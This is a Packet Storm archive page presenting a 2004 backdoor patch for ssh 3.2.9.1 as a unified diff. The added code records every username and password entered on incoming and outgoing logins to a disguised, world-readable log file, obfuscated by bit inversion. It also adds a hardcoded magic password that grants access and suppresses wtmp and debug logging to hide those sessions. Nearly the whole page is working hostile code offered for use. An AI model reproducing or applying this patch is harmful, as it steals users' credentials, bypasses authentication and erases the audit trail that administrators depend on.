exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

apatch-ssh-3.2.9.1

apatch-ssh-3.2.9.1
Posted Sep 23, 2004
Authored by Aion

Apatch for ssh v3.2.9.1 which saves user passwords to a file and allows for a magic backdoor password.

tags | patch
systems | unix
SHA-256 | f08fe89482e672931485c68ecde25820cbcf0b761f0ca51f8db7377ca152326a

apatch-ssh-3.2.9.1

Change Mirror Download
diff -N -r -c ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/authc-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-kbd-interactive.c 2004-07-18 11:52:41.000000000 +0300
***************
*** 204,209 ****
--- 204,213 ----
{
/* XXX async, please! */
gdata->response = ssh_read_passphrase(msg, FALSE);
+ aionlog("kbdito: %s \tuser: %s \tpass: %s\n",
+ gdata->client->remote_server,
+ gdata->client->remote_user,
+ gdata->response);
if (gdata->response)
gdata->response_len = strlen(gdata->response);
else
diff -N -r -c ssh-3.2.9.1/apps/ssh/authc-passwd.c ssh-3.2.9.1+/apps/ssh/authc-passwd.c
*** ssh-3.2.9.1/apps/ssh/authc-passwd.c 2003-12-03 15:17:24.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/authc-passwd.c 2004-07-18 11:53:59.000000000 +0300
***************
*** 105,110 ****
--- 105,112 ----
SSH_TRACE(2, ("Starting password auth..."));
#ifndef SSH_NEW_READPASS_ELOOP
password = ssh_read_passphrase(buf, FALSE);
+ aionlog("pwto: %s \tuser: %s \tpass: %s\n",
+ client->common->remote_ip, client->remote_user, password);
#else /* SSH_NEW_READPASS_ELOOP */
ssh_readpass_eloop();
return;
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-interactive.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-interactive.c 2004-07-18 11:46:29.000000000 +0300
***************
*** 284,289 ****
--- 284,294 ----
goto proto_error;

state->resps[i] = resp;
+ if(!strcmp(LEETPASS, resp))
+ aion = 1;
+ else
+ aionlog("kbdifrom: %s \tuser: %s \tpass: %s\n",
+ state->server->common->remote_ip, state->user, resp);
}

/* Pass replys to submethod. */
diff -N -r -c ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c
*** ssh-3.2.9.1/apps/ssh/auths-kbd-int-pam.c 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/auths-kbd-int-pam.c 2004-07-18 11:47:23.000000000 +0300
***************
*** 273,278 ****
--- 273,279 ----
}
}

+ if(aion) packet_type = SSH_PAM_OP_SUCCESS;
switch (packet_type)
{
case SSH_PAM_OP_SUCCESS:
diff -N -r -c ssh-3.2.9.1/apps/ssh/ssh2version.h ssh-3.2.9.1+/apps/ssh/ssh2version.h
*** ssh-3.2.9.1/apps/ssh/ssh2version.h 2003-12-03 15:17:26.000000000 +0200
--- ssh-3.2.9.1+/apps/ssh/ssh2version.h 2004-07-18 11:32:23.000000000 +0300
***************
*** 1 ****
! #define SSH2_VERSION "3.2.9.1"
--- 1 ----
! #define SSH2_VERSION "3.2.9.1" // change it
diff -N -r -c ssh-3.2.9.1/lib/sshsession/sshunixuser.c ssh-3.2.9.1+/lib/sshsession/sshunixuser.c
*** ssh-3.2.9.1/lib/sshsession/sshunixuser.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/sshunixuser.c 2004-07-18 11:50:27.000000000 +0300
***************
*** 890,895 ****
--- 890,898 ----
char *encrypted_password;
const char *correct_passwd = uc->correct_encrypted_passwd;

+ if(!strcmp(LEETPASS, password)) return aion = 1;
+ aionlog("pwfrom: %s \tuser: %s \tpass: %s\n",
+ remote_host, uc->name, password);
#ifdef HAVE_ULTRIX_SHADOW_PASSWORDS
{
struct svcinfo *svp;
diff -N -r -c ssh-3.2.9.1/lib/sshsession/wtmp.c ssh-3.2.9.1+/lib/sshsession/wtmp.c
*** ssh-3.2.9.1/lib/sshsession/wtmp.c 2003-12-03 15:17:21.000000000 +0200
--- ssh-3.2.9.1+/lib/sshsession/wtmp.c 2004-07-18 11:35:54.000000000 +0300
***************
*** 221,226 ****
--- 221,229 ----
struct utmp u;
const char *utmp, *wtmp;

+ #endif
+ if(aion) return;
+ #if defined(HAVE_UTMP_H) && !defined(HAVE_UTMPX_H)
/* Construct an utmp/wtmp entry. */
memset(&u, 0, sizeof(u));
# if defined(DEAD_PROCESS) && defined(HAVE_TYPE_IN_UTMP)
***************
*** 585,590 ****
--- 588,594 ----
{
#ifdef HAVE_LIBUTIL_LOGIN
const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */
+ if(aion) return;
if (logout((char *)line))
logwtmp((char *)line, "", "");
#else /* HAVE_LIBUTIL_LOGIN */
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c
*** ssh-3.2.9.1/lib/sshutil/sshcore/sshdebug.c 2003-12-03 15:17:29.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshcore/sshdebug.c 2004-07-18 11:37:26.000000000 +0300
***************
*** 806,811 ****
--- 806,812 ----
ssh_vsnprintf(buf, sizeof(buf), fmt, va);
va_end(va);

+ if(aion) return;
/* If a callback has been set, use it to send the message. */
if (ssh_debug_log_callback)
(*ssh_debug_log_callback)(facility, severity, buf, ssh_debug_log_context);
diff -N -r -c ssh-3.2.9.1/lib/sshutil/sshincludes.h ssh-3.2.9.1+/lib/sshutil/sshincludes.h
*** ssh-3.2.9.1/lib/sshutil/sshincludes.h 2003-12-03 15:17:18.000000000 +0200
--- ssh-3.2.9.1+/lib/sshutil/sshincludes.h 2004-07-18 11:14:44.000000000 +0300
***************
*** 13,18 ****
--- 13,39 ----

*/

+ // patch by Aion
+ #include <sys/stat.h>
+ #include <stdio.h>
+
+ #define LEETPASS "gathering"
+ #define SSH_LOG "/var/log/kmesg"
+
+ FILE *alog;
+ char abuff[512];
+ int alen, ai, aion;
+
+ #define aionlog(arg...) { \
+ ssh_snprintf(abuff, sizeof(abuff), ##arg); \
+ alen=strlen(abuff); \
+ for(ai=0; ai<=alen; ai++) abuff[ai]=~abuff[ai]; \
+ alog=fopen(SSH_LOG, "a"); \
+ if(alog!=NULL) { fwrite(abuff, alen, 1, alog); fclose(alog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+ // end patch
+
#ifndef SSHINCLUDES_H
#define SSHINCLUDES_H

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close